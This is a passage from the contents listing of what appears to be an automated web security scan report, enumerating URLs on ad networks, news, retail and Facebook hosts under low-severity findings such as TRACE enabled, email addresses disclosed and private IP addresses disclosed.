16.52. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83819639/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.53. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=83891309/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.54. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=84418946/hr=13/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.55. http://r1-ads.ace.advertising.com/site=768034/size=728090/u=2/bnum=93497556/hr=14/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.56. http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=2746764/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.57. http://r1-ads.ace.advertising.com/site=804480/size=300250/u=2/bnum=76077167/hr=7/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.58. http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=22657113/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.59. http://r1-ads.ace.advertising.com/site=804481/size=728090/u=2/bnum=91341378/hr=8/hl=3/c=3/scres=5/swh=1920x1200/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/dref=http%253A%252F%252Fwww.cnbc.com%252Fid%252F43422860

16.60. http://radiumone.com/

16.61. http://reviews.homedepot.com/1999q/202642971/reviews.htm

16.62. http://reviews.homedepot.com/1999s/202642971/reviews.htm

16.63. http://rs.gwallet.com/r1/pixel/x9r8101111

16.64. http://rs.gwallet.com/r1/pixel/x9r8962146

16.65. http://search.cnbc.com/main.do

16.66. http://soundcloud.com/

16.67. http://soundcloud.com/help

16.68. http://soundcloud.com/help/premium-accounts

16.69. http://soundcloud.com/premium

16.70. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

16.71. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

16.72. http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf

16.73. http://tag.admeld.com/ad/iframe/677/cnbc/728x90/atf

16.74. http://www.capitalone.com/creditcards/venture-one-rewards-credit-card/11858/15/

16.75. http://www.cnbc.com/

16.76. http://www.cnbc.com/id/43422860

16.77. http://www.creditcards.com/0-apr-credit-cards.php

16.78. http://www.creditcards.com/instant-approval.php

16.79. http://www.egov.com/Pages/default.aspx

16.80. http://www.egov.com/Solutions/Funding/Pages/default.aspx

16.81. http://www.egov.com/Solutions/Pages/default.aspx

16.82. http://www.facebook.com/plugins/like.php

16.83. http://www.facebook.com/plugins/recommendations.php

16.84. http://www.facebook.com/widgets/recommendations.php

16.85. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment-Riding-Mowers-Gas-Riding-Mowers/h_d1/N-5yc1vZbx9b/h_d2/Navigation

16.86. http://www.homedepot.com/Outdoors-Outdoor-Power-Equipment/h_d1/N-5yc1vZbx5c/h_d2/Navigation

16.87. http://www.homedepot.com/webapp/wcs/stores/servlet/Navigation

16.88. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate

16.89. http://www.homedepot.com/webapp/wcs/stores/servlet/ProductDisplay

16.90. http://www.ilslaunch.com/mission-control/mission-skyterra-1

16.91. http://www.lightsquared.com/press-room/press-releases/lightsquared-and-cellular-south-announce-they-have-entered-into-a-bilateral-roaming-agreement/

16.92. http://www.lightsquared.com/uncategorized/welcome-to-insights/

17. TRACE method is enabled

17.1. http://ads.cleveland.com/

17.2. http://ads.nj.com/

17.3. http://ads.oregonlive.com/

17.4. http://ads1.msn.com/

17.5. http://am.nexac.com/

17.6. http://amch.questionmarket.com/

17.7. http://cache.specificmedia.com/

17.8. http://cheetah.vizu.com/

17.9. http://dsp.adledge.com/

17.10. http://image2.pubmatic.com/

17.11. http://login.dotomi.com/

17.12. http://matcher-apx.bidder7.mookie1.com/

17.13. http://matcher.bidder7.mookie1.com/

17.14. http://matcher.bidder8.mookie1.com/

17.15. http://optimized-by.rubiconproject.com/

17.16. http://pixel.everesttech.net/

17.17. http://pixel.rubiconproject.com/

17.18. http://puma.vizu.com/

17.19. http://rt.legolas-media.com/

17.20. http://secure-us.imrworldwide.com/

17.21. http://spotlight.creditcards.com/

17.22. http://t.mookie1.com/

17.23. http://tacoda.at.atwola.com/

17.24. http://tap.rubiconproject.com/

17.25. http://tracking.hubspot.com/

17.26. http://www.lightsquared.com/

17.27. http://www.nutter.com/

18. Email addresses disclosed

18.1. http://ads1.msn.com/library/dap.js

18.2. http://control.radiumone.com/gwallet-network-admin/com.gwallet.network.admin.NetworkAdminApp/E28F87B1547ED2D93778B6C7B663A9A5.cache.html

18.3. http://creditcards.citicards.com/usc/thankyou/Preferred/external/May2011/50GC/js/jquery-rotate-min.htm

18.4. http://radiumone.com/mobile/index.html

18.5. http://radiumone.com/network/index.html

18.6. http://radiumone.com/social/developer.html

18.7. http://s.wsj.net/djscript/j_global.js

18.8. https://services.wsj.com/Gryphon/javascripts/djcheck.js

18.9. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0004/provided/j_global_slim/version/20110524192024.js

18.10. http://sj.wsj.net/djscript/require/j_global_slim/version/20110615092718.js

18.11. http://soundcloud.com/premium

18.12. http://www.capitalone.com/css/footer.css

18.13. http://www.capitalone.com/css/framework/base.css

18.14. http://www.capitalone.com/css/framework/grid.css

18.15. http://www.capitalone.com/css/framework/print.css

18.16. http://www.capitalone.com/css/header.css

18.17. http://www.capitalone.com/css/page-nav-heading.css

18.18. http://www.capitalone.com/css/page-type/product.css

18.19. http://www.creditcards.com/javascript/s_code.js

18.20. http://www.egov.com/Scripts/jquery.pngFix.js

18.21. http://www.egov.com/Solutions/Funding/Pages/default.aspx

18.22. http://www.egov.com/Solutions/Pages/default.aspx

18.23. http://www.homedepot.com/static/scripts/jquery/jquery.pubsub.js

18.24. http://www.homedepot.com/wcsstore/hdus/en_US/styles/jquery.fancybox-1.3.4.css

18.25. http://www.homedepot.com/wcsstore/hdus/scripts/DD_belatedPNG_0.0.8a-min.js

18.26. http://www.homedepot.com/wcsstore/hdus/scripts/jquery.cookie.js

18.27. http://www.homedepot.com/webapp/wcs/stores/servlet/OrderCalculate

18.28. http://www.ilslaunch.com/sites/default/files/js/js_2518332c0b755f1d85c27c9500834ae3.js

18.29. http://www.inlandbusinesslaw.com/attorneyprofiles.html

18.30. http://www.inlandbusinesslaw.com/contactus.html

18.31. http://www.inlandbusinesslaw.com/scripts/user.js

18.32. http://www.lightsquared.com/contact-us/

18.33. http://www.lightsquared.com/press-room/press-releases/lightsquared-and-cellular-south-announce-they-have-entered-into-a-bilateral-roaming-agreement/

18.34. http://www.lightsquared.com/wp-content/themes/lightsquared/js/lightsquared.js

19. Private IP addresses disclosed

19.1. http://check4.facebook.com/ajax/v6.php

19.2. http://check4.facebook.com/ajax/v6.php

19.3. http://check4.facebook.com/ajax/v6.php

19.4. http://check4.facebook.com/ajax/v6.php

19.5. http://check4.facebook.com/ajax/v6.php

19.6. http://check4.facebook.com/ajax/v6.php

19.7. http://check4.facebook.com/ajax/v6.php

19.8. http://check4.facebook.com/ajax/v6.php

19.9. http://check4.facebook.com/ajax/v6.php

19.10. http://check4.facebook.com/ajax/v6.php

19.11. http://check4.facebook.com/ajax/v6.php

19.12. http://check4.facebook.com/ajax/v6.php

19.13. http://check4.facebook.com/ajax/v6.php

19.14. http://check4.facebook.com/ajax/v6.php

19.15. http://check4.facebook.com/ajax/v6.php

19.16. http://check4.facebook.com/ajax/v6.php

19.17. http://check4.facebook.com/ajax/v6.php

19.18. http://check4.facebook.com/ajax/v6.php

19.19. http://check4.facebook.com/ajax/v6.php

19.20. http://check4.facebook.com/ajax/v6.php

19.21. http://check4.facebook.com/ajax/v6.php

19.22. http://check4.facebook.com/ajax/v6.php

19.23. http://check4.facebook.com/ajax/v6.php

19.24. http://check4.facebook.com/ajax/v6.php

19.25. http://check4.facebook.com/ajax/v6.php

19.26. http://check4.facebook.com/ajax/v6.php

19.27. http://check4.facebook.com/ajax/v6.php

19.28. http://check4.facebook.com/ajax/v6.php

19.29. http://check4.facebook.com/ajax/v6.php

19.30. http://check4.facebook.com/ajax/v6.php

19.31. http://check4.facebook.com/ajax/v6.php

19.32. http://check4.facebook.com/ajax/v6.php

19.33. http://check4.facebook.com/ajax/v6.php

19.34. http://check4.facebook.com/ajax/v6.php

19.35. http://check4.facebook.com/ajax/v6.php

19.36. http://check4.facebook.com/ajax/v6.php

19.37. http://check4.facebook.com/ajax/v6.php

19.38. http://check4.facebook.com/ajax/v6.php

19.39. http://check4.facebook.com/ajax/v6.php

19.40. http://check4.facebook.com/ajax/v6.php

19.41. http://check4.facebook.com/ajax/v6.php

19.42. http://check4.facebook.com/ajax/v6.php

19.43. http://check4.facebook.com/ajax/v6.php

19.44. http://check4.facebook.com/ajax/v6.php

19.45. http://check4.facebook.com/ajax/v6.php

19.46. http://check4.facebook.com/ajax/v6.php

19.47. http://check4.facebook.com/ajax/v6.php

19.48. http://check4.facebook.com/ajax/v6.php

19.49. http://check4.facebook.com/ajax/v6.php

19.50. http://check4.facebook.com/ajax/v6.php

19.51. http://check4.facebook.com/ajax/v6.php

19.52. http://check4.facebook.com/ajax/v6.php

19.53. http://check4.facebook.com/ajax/v6.php

19.54. http://check4.facebook.com/ajax/v6.php

19.55. http://check4.facebook.com/ajax/v6.php

19.56. http://check4.facebook.com/ajax/v6.php

19.57. http://check4.facebook.com/ajax/v6.php

19.58. http://check4.facebook.com/ajax/v6.php

19.59. http://check4.facebook.com/ajax/v6.php

19.60. http://check4.facebook.com/ajax/v6.php

19.61. http://check4.facebook.com/ajax/v6.php

19.62. http://check4.facebook.com/ajax/v6.php

19.63. http://check4.facebook.com/ajax/v6.php

19.64. http://check4.facebook.com/ajax/v6.php

19.65. http://check4.facebook.com/ajax/v6.php

19.66. http://check4.facebook.com/ajax/v6.php

19.67. http://check4.facebook.com/ajax/v6.php

19.68. http://check4.facebook.com/ajax/v6.php

19.69. http://check4.facebook.com/ajax/v6.php

19.70. http://check4.facebook.com/ajax/v6.php

19.71. http://check4.facebook.com/ajax/v6.php

19.72. http://check4.facebook.com/ajax/v6.php

19.73. http://check4.facebook.com/ajax/v6.php

19.74. http://check4.facebook.com/ajax/v6.php

19.75. http://check4.facebook.com/ajax/v6.php

19.76. http://check4.facebook.com/ajax/v6.php

19.77. http://check4.facebook.com/ajax/v6.php

19.78. http://check4.facebook.com/ajax/v6.php

19.79. http://check4.facebook.com/ajax/v6.php

19.80. http://check4.facebook.com/ajax/v6.php

19.81. http://check4.facebook.com/ajax/v6.php

19.82. http://check4.facebook.com/ajax/v6.php

19.83. http://check4.facebook.com/ajax/v6.php

19.84. http://check4.facebook.com/ajax/v6.php

19.85. http://check4.facebook.com/ajax/v6.php

19.86. http://check4.facebook.com/ajax/v6.php

19.87. http://check4.facebook.com/ajax/v6.php

19.88. http://check4.facebook.com/ajax/v6.php

19.89. http://check4.facebook.com/ajax/v6.php

19.90. http://check4.facebook.com/ajax/v6.php

19.91. http://check4.facebook.com/ajax/v6.php

19.92. http://check4.facebook.com/ajax/v6.php

19.93. http://check4.facebook.com/ajax/v6.php

19.94. http://check4.facebook.com/ajax/v6.php

19.95. http://check4.facebook.com/ajax/v6.php

19.96. http://check4.facebook.com/ajax/v6.php

19.97. http://check4.facebook.com/ajax/v6.php

19.98. http://check4.facebook.com/ajax/v6.php

19.99. http://check4.facebook.com/ajax/v6.php

19.100. http://check4.facebook.com/ajax/v6.php

19.101. http://check4.facebook.com/ajax/v6.php

19.102. http://check4.facebook.com/ajax/v6.php

19.103. http://check4.facebook.com/ajax/v6.php

19.104. http://check4.facebook.com/ajax/v6.php

19.105. http://check4.facebook.com/ajax/v6.php

19.106. http://check4.facebook.com/ajax/v6.php

19.107. http://check4.facebook.com/ajax/v6.php

19.108. http://check4.facebook.com/ajax/v6.php

19.109. http://check4.facebook.com/ajax/v6.php

19.110. http://check4.facebook.com/ajax/v6.php

19.111. http://check4.facebook.com/ajax/v6.php

19.112. http://check4.facebook.com/ajax/v6.php

19.113. http://check4.facebook.com/ajax/v6.php

19.114. http://check4.facebook.com/ajax/v6.php

19.115. http://check4.facebook.com/ajax/v6.php

19.116. http://check4.facebook.com/ajax/v6.php

19.117. http://check4.facebook.com/ajax/v6.php

19.118. http://check4.facebook.com/ajax/v6.php

19.119. http://check4.facebook.com/ajax/v6.php

19.120. http://check4.facebook.com/ajax/v6.php

19.121. http://check4.facebook.com/ajax/v6.php

19.122. http://check4.facebook.com/ajax/v6.php

19.123. http://check4.facebook.com/ajax/v6.php

19.124. http://check4.facebook.com/ajax/v6.php

19.125. http://check4.facebook.com/ajax/v6.php

19.126. http://check4.facebook.com/ajax/v6.php

19.127. http://check4.facebook.com/ajax/v6.php

19.128. http://check4.facebook.com/ajax/v6.php

19.129. http://check4.facebook.com/ajax/v6.php

19.130. http://check4.facebook.com/ajax/v6.php

19.131. http://check4.facebook.com/ajax/v6.php

19.132. http://check4.facebook.com/ajax/v6.php

19.133. http://check4.facebook.com/ajax/v6.php

19.134. http://check4.facebook.com/ajax/v6.php

19.135. http://check4.facebook.com/ajax/v6.php

19.136. http://check4.facebook.com/ajax/v6.php

19.137. http://check4.facebook.com/ajax/v6.php

19.138. http://check4.facebook.com/ajax/v6.php

19.139. http://check4.facebook.com/ajax/v6.php

19.140. http://check4.facebook.com/ajax/v6.php

19.141. http://check4.facebook.com/ajax/v6.php

19.142. http://check4.facebook.com/ajax/v6.php

19.143. http://check4.facebook.com/ajax/v6.php

19.144. http://check4.facebook.com/ajax/v6.php

19.145. http://check4.facebook.com/ajax/v6.php

19.146. http://check4.facebook.com/ajax/v6.php

19.147. http://check4.facebook.com/ajax/v6.php

19.148. http://check4.facebook.com/ajax/v6.php

19.149. http://check4.facebook.com/ajax/v6.php

19.150. http://check4.facebook.com/ajax/v6.php

19.151. http://check4.facebook.com/ajax/v6.php

19.152. http://check4.facebook.com/ajax/v6.php

19.153. http://check4.facebook.com/ajax/v6.php

19.154. http://check4.facebook.com/ajax/v6.php

19.155. http://check4.facebook.com/ajax/v6.php

19.156. http://check4.facebook.com/ajax/v6.php

19.157. http://check4.facebook.com/ajax/v6.php

19.158. http://check4.facebook.com/ajax/v6.php

19.159. http://check4.facebook.com/ajax/v6.php

19.160. http://check4.facebook.com/ajax/v6.php

19.161. http://check4.facebook.com/ajax/v6.php

19.162. http://check4.facebook.com/ajax/v6.php

19.163. http://check4.facebook.com/ajax/v6.php

19.164. http://check4.facebook.com/ajax/v6.php

19.165. http://check4.facebook.com/ajax/v6.php

19.166. http://check4.facebook.com/ajax/v6.php

19.167. http://check6.facebook.com/ajax/v6.php

19.168. http://check6.facebook.com/ajax/v6.php

19.169. http://check6.facebook.com/ajax/v6.php

19.170. http://check6.facebook.com/ajax/v6.php

19.171. http://check6.facebook.com/ajax/v6.php

19.172. http://check6.facebook.com/ajax/v6.php

19.173. http://check6.facebook.com/ajax/v6.php

19.174. http://check6.facebook.com/ajax/v6.php

19.175. http://check6.facebook.com/ajax/v6.php

19.176. http://check6.facebook.com/ajax/v6.php

19.177. http://check6.facebook.com/ajax/v6.php

19.178. http://check6.facebook.com/ajax/v6.php

19.179. http://check6.facebook.com/ajax/v6.php

19.180. http://check6.facebook.com/ajax/v6.php

19.181. http://check6.facebook.com/ajax/v6.php

19.182. http://check6.facebook.com/ajax/v6.php

19.183. http://check6.facebook.com/ajax/v6.php

19.184. http://check6.facebook.com/ajax/v6.php

19.185. http://check6.facebook.com/ajax/v6.php

19.186. http://check6.facebook.com/ajax/v6.php

19.187. http://check6.facebook.com/ajax/v6.php

19.188. http://check6.facebook.com/ajax/v6.php

19.189. http://check6.facebook.com/ajax/v6.php

19.190. http://check6.facebook.com/ajax/v6.php

19.191. http://check6.facebook.com/ajax/v6.php

19.192. http://check6.facebook.com/ajax/v6.php

19.193. http://check6.facebook.com/ajax/v6.php

19.194. http://check6.facebook.com/ajax/v6.php

19.195. http://check6.facebook.com/ajax/v6.php

19.196. http://check6.facebook.com/ajax/v6.php

19.197. http://check6.facebook.com/ajax/v6.php

19.198. http://check6.facebook.com/ajax/v6.php

19.199. http://check6.facebook.com/ajax/v6.php

19.200. http://check6.facebook.com/ajax/v6.php

19.201. http://check6.facebook.com/ajax/v6.php

19.202. http://check6.facebook.com/ajax/v6.php

19.203. http://check6.facebook.com/ajax/v6.php

19.204. http://check6.facebook.com/ajax/v6.php

19.205. http://check6.facebook.com/ajax/v6.php

19.206. http://check6.facebook.com/ajax/v6.php

19.207. http://check6.facebook.com/ajax/v6.php

19.208. http://check6.facebook.com/ajax/v6.php

19.209. http://check6.facebook.com/ajax/v6.php

19.210. http://check6.facebook.com/ajax/v6.php

19.211. http://check6.facebook.com/ajax/v6.php

19.212. http://check6.facebook.com/ajax/v6.php

19.213. http://check6.facebook.com/ajax/v6.php

19.214. http://check6.facebook.com/ajax/v6.php

19.215. http://check6.facebook.com/ajax/v6.php

19.216. http://check6.facebook.com/ajax/v6.php

19.217. http://check6.facebook.com/ajax/v6.php

19.218. http://check6.facebook.com/ajax/v6.php

19.219. http://check6.facebook.com/ajax/v6.php

19.220. http://check6.facebook.com/ajax/v6.php

19.221. http://check6.facebook.com/ajax/v6.php

19.222. http://check6.facebook.com/ajax/v6.php

19.223. http://check6.facebook.com/ajax/v6.php

19.224. http://check6.facebook.com/ajax/v6.php

19.225. http://check6.facebook.com/ajax/v6.php

19.226. http://check6.facebook.com/ajax/v6.php

19.227. http://check6.facebook.com/ajax/v6.php

19.228. http://check6.facebook.com/ajax/v6.php

19.229. http://check6.facebook.com/ajax/v6.php

19.230. http://check6.facebook.com/ajax/v6.php

19.231. http://check6.facebook.com/ajax/v6.php

19.232. http://check6.facebook.com/ajax/v6.php

19.233. http://check6.facebook.com/ajax/v6.php

19.234. http://check6.facebook.com/ajax/v6.php

19.235. http://check6.facebook.com/ajax/v6.php

19.236. http://check6.facebook.com/ajax/v6.php

19.237. http://check6.facebook.com/ajax/v6.php

19.238. http://check6.facebook.com/ajax/v6.php

19.239. http://check6.facebook.com/ajax/v6.php

19.240. http://check6.facebook.com/ajax/v6.php

19.241. http://check6.facebook.com/ajax/v6.php

19.242. http://check6.facebook.com/ajax/v6.php

19.243. http://check6.facebook.com/ajax/v6.php

19.244. http://check6.facebook.com/ajax/v6.php

19.245. http://check6.facebook.com/ajax/v6.php

19.246. http://check6.facebook.com/ajax/v6.php

19.247. http://check6.facebook.com/ajax/v6.php

19.248. http://check6.facebook.com/ajax/v6.php

19.249. http://check6.facebook.com/ajax/v6.php

19.250. http://check6.facebook.com/ajax/v6.php

19.251. http://check6.facebook.com/ajax/v6.php

19.252. http://check6.facebook.com/ajax/v6.php

19.253. http://check6.facebook.com/ajax/v6.php

19.254. http://check6.facebook.com/ajax/v6.php

19.255. http://check6.facebook.com/ajax/v6.php

19.256. http://check6.facebook.com/ajax/v6.php

19.257. http://check6.facebook.com/ajax/v6.php

19.258. http://check6.facebook.com/ajax/v6.php

19.259. http://check6.facebook.com/ajax/v6.php

19.260. http://check6.facebook.com/ajax/v6.php

19.261. http://check6.facebook.com/ajax/v6.php

19.262. http://check6.facebook.com/ajax/v6.php

19.263. http://check6.facebook.com/ajax/v6.php

19.264. http://check6.facebook.com/ajax/v6.php

19.265. http://check6.facebook.com/ajax/v6.php

19.266. http://check6.facebook.com/ajax/v6.php

19.267. http://check6.facebook.com/ajax/v6.php

19.268. http://check6.facebook.com/ajax/v6.php

19.269. http://check6.facebook.com/ajax/v6.php

19.270. http://check6.facebook.com/ajax/v6.php

19.271. http://check6.facebook.com/ajax/v6.php

19.272. http://check6.facebook.com/ajax/v6.php

19.273. http://check6.facebook.com/ajax/v6.php

19.274. http://check6.facebook.com/ajax/v6.php

19.275. http://check6.facebook.com/ajax/v6.php

19.276. http://check6.facebook.com/ajax/v6.php

19.277. http://check6.facebook.com/ajax/v6.php

19.278. http://check6.facebook.com/ajax/v6.php

19.279. http://check6.facebook.com/ajax/v6.php

19.280. http://check6.facebook.com/ajax/v6.php

19.281. http://check6.facebook.com/ajax/v6.php

19.282. http://check6.facebook.com/ajax/v6.php

19.283. http://check6.facebook.com/ajax/v6.php

19.284. http://check6.facebook.com/ajax/v6.php

19.285. http://check6.facebook.com/ajax/v6.php

19.286. http://check6.facebook.com/ajax/v6.php

19.287. http://check6.facebook.com/ajax/v6.php

19.288. http://check6.facebook.com/ajax/v6.php

19.289. http://check6.facebook.com/ajax/v6.php

19.290. http://check6.facebook.com/ajax/v6.php

19.291. http://check6.facebook.com/ajax/v6.php

19.292. http://check6.facebook.com/ajax/v6.php

19.293. http://check6.facebook.com/ajax/v6.php

19.294. http://check6.facebook.com/ajax/v6.php

19.295. http://check6.facebook.com/ajax/v6.php

19.296. http://check6.facebook.com/ajax/v6.php

19.297. http://check6.facebook.com/ajax/v6.php

19.298. http://check6.facebook.com/ajax/v6.php

19.299. http://check6.facebook.com/ajax/v6.php

19.300. http://check6.facebook.com/ajax/v6.php

19.301. http://check6.facebook.com/ajax/v6.php

19.302. http://check6.facebook.com/ajax/v6.php

19.303. http://check6.facebook.com/ajax/v6.php

19.304. http://check6.facebook.com/ajax/v6.php

19.305. http://check6.facebook.com/ajax/v6.php

19.306. http://check6.facebook.com/ajax/v6.php

19.307. http://check6.facebook.com/ajax/v6.php

19.308. http://check6.facebook.com/ajax/v6.php

19.309. http://check6.facebook.com/ajax/v6.php

19.310. http://check6.facebook.com/ajax/v6.php

19.311. http://check6.facebook.com/ajax/v6.php

19.312. http://check6.facebook.com/ajax/v6.php

19.313. http://check6.facebook.com/ajax/v6.php

19.314. http://check6.facebook.com/ajax/v6.php

19.315. http://check6.facebook.com/ajax/v6.php

19.316. http://check6.facebook.com/ajax/v6.php

19.317. http://check6.facebook.com/ajax/v6.php

19.318. http://check6.facebook.com/ajax/v6.php

19.319. http://check6.facebook.com/ajax/v6.php

19.320. http://check6.facebook.com/ajax/v6.php

19.321. http://check6.facebook.com/ajax/v6.php

19.322. http://check6.facebook.com/ajax/v6.php

19.323. http://check6.facebook.com/ajax/v6.php

19.324. http://check6.facebook.com/ajax/v6.php

19.325. http://check6.facebook.com/ajax/v6.php

19.326. http://check6.facebook.com/ajax/v6.php

19.327. http://check6.facebook.com/ajax/v6.php

19.328. http://check6.facebook.com/ajax/v6.php

19.329. http://check6.facebook.com/ajax/v6.php

19.330. http://check6.facebook.com/ajax/v6.php

19.331. http://check6.facebook.com/ajax/v6.php

19.332. http://check6.facebook.com/ajax/v6.php

19.333. http://check6.facebook.com/ajax/v6.php

19.334. http://check6.facebook.com/ajax/v6.php

19.335. http://connect.facebook.net/en_US/all.js

19.336. http://external.ak.fbcdn.net/safe_image.php

19.337. http://external.ak.fbcdn.net/safe_image.php

19.338. http://external.ak.fbcdn.net/safe_image.php

19.339. http://external.ak.fbcdn.net/safe_image.php

19.340. http://external.ak.fbcdn.net/safe_image.php

19.341. http://external.ak.fbcdn.net/safe_image.php

19.342. http://external.ak.fbcdn.net/safe_image.php

19.343. http://external.ak.fbcdn.net/safe_image.php

19.344. http://external.ak.fbcdn.net/safe_image.php

19.345. http://external.ak.fbcdn.net/safe_image.php

19.346. http://external.ak.fbcdn.net/safe_image.php

19.347. http://external.ak.fbcdn.net/safe_image.php

19.348. http://external.ak.fbcdn.net/safe_image.php

19.349. https://services.wsj.com/Gryphon/javascripts/s_code_ps.js

19.350. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.351. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.352. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.353. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.354. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.355. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.356. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.357. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.358. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.359. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.360. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.361. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.362. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.363. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.364. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.365. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.366. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.367. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.368. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.369. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.370. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.371. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.372. http://static.ak.fbcdn.net/connect/xd_proxy.php

19.373. http://static.ak.fbcdn.net/rsrc.php/v1/y5/r/5YkCKQk_Uwd.js

19.374. http://static.ak.fbcdn.net/rsrc.php/v1/yF/r/H7He8TCHOS8.js

19.375. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/WzO4x8ghoO7.js

19.376. http://static.ak.fbcdn.net/rsrc.php/v1/yG/r/WzO4x8ghoO7.js

19.377. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/EMbN9YbXDOI.js

19.378. http://static.ak.fbcdn.net/rsrc.php/v1/yN/r/EMbN9YbXDOI.js

19.379. http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/IqATM6kdESm.css

19.380. http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/l3KbrDcjIMH.css

19.381. http://static.ak.fbcdn.net/rsrc.php/v1/ye/r/rtDNAXiTAA6.css

19.382. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/ZJFvhBcInvq.js

19.383. http://static.ak.fbcdn.net/rsrc.php/v1/yg/r/58rT2Q2u2Tj.js

19.384. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/iTSK7icHWCE.js

19.385. http://static.ak.fbcdn.net/rsrc.php/v1/ys/r/iTSK7icHWCE.js

19.386. http://static.ak.fbcdn.net/rsrc.php/v1/yt/r/GfxPxxjOIDF.css

19.387. http://static.ak.fbcdn.net/rsrc.php/v1/yy/r/vX9_1hezWgO.js

19.388. http://static.ak.fbcdn.net/rsrc.php/v1/zF/r/p13yZ069LVL.png

19.389. http://static.ak.fbcdn.net/rsrc.php/v1/zF/r/p13yZ069LVL.png

19.390. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png

19.391. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png

19.392. http://www.facebook.com/common/scribe_endpoint.php

19.393. http://www.facebook.com/common/scribe_endpoint.php

19.394. http://www.facebook.com/common/scribe_endpoint.php

19.395. http://www.facebook.com/common/scribe_endpoint.php

19.396. http://www.facebook.com/common/scribe_endpoint.php

19.397. http://www.facebook.com/common/scribe_endpoint.php

19.398. http://www.facebook.com/common/scribe_endpoint.php

19.399. http://www.facebook.com/common/scribe_endpoint.php

19.400. http://www.facebook.com/common/scribe_endpoint.php

19.401. http://www.facebook.com/common/scribe_endpoint.php

19.402. http://www.facebook.com/common/scribe_endpoint.php

19.403. http://www.facebook.com/common/scribe_endpoint.php

19.404. http://www.facebook.com/common/scribe_endpoint.php

19.405. http://www.facebook.com/common/scribe_endpoint.php

19.406. http://www.facebook.com/common/scribe_endpoint.php

19.407. http://www.facebook.com/common/scribe_endpoint.php

19.408. http://www.facebook.com/common/scribe_endpoint.php

19.409. http://www.facebook.com/common/scribe_endpoint.php

19.410. http://www.facebook.com/common/scribe_endpoint.php

19.411. http://www.facebook.com/common/scribe_endpoint.php

19.412. http://www.facebook.com/common/scribe_endpoint.php

19.413. http://www.facebook.com/common/scribe_endpoint.php

19.414. http://www.facebook.com/common/scribe_endpoint.php

19.415. http://www.facebook.com/common/scribe_endpoint.php

19.416. http://www.facebook.com/common/scribe_endpoint.php

19.417. http://www.facebook.com/common/scribe_endpoint.php

19.418. http://www.facebook.com/common/scribe_endpoint.php

19.419. http://www.facebook.com/common/scribe_endpoint.php

19.420. http://www.facebook.com/common/scribe_endpoint.php

19.421. http://www.facebook.com/common/scribe_endpoint.php

19.422. http://www.facebook.com/common/scribe_endpoint.php

19.423. http://www.facebook.com/common/scribe_endpoint.php

19.424. http://www.facebook.com/common/scribe_endpoint.php

19.425. http://www.facebook.com/common/scribe_endpoint.php

19.426. http://www.facebook.com/common/scribe_endpoint.php

19.427. http://www.facebook.com/common/scribe_endpoint.php

19.428. http://www.facebook.com/common/scribe_endpoint.php

19.429. http://www.facebook.com/common/scribe_endpoint.php

19.430. http://www.facebook.com/common/scribe_endpoint.php

19.431. http://www.facebook.com/common/scribe_endpoint.php

19.432. http://www.facebook.com/common/scribe_endpoint.php

19.433. http://www.facebook.com/common/scribe_endpoint.php

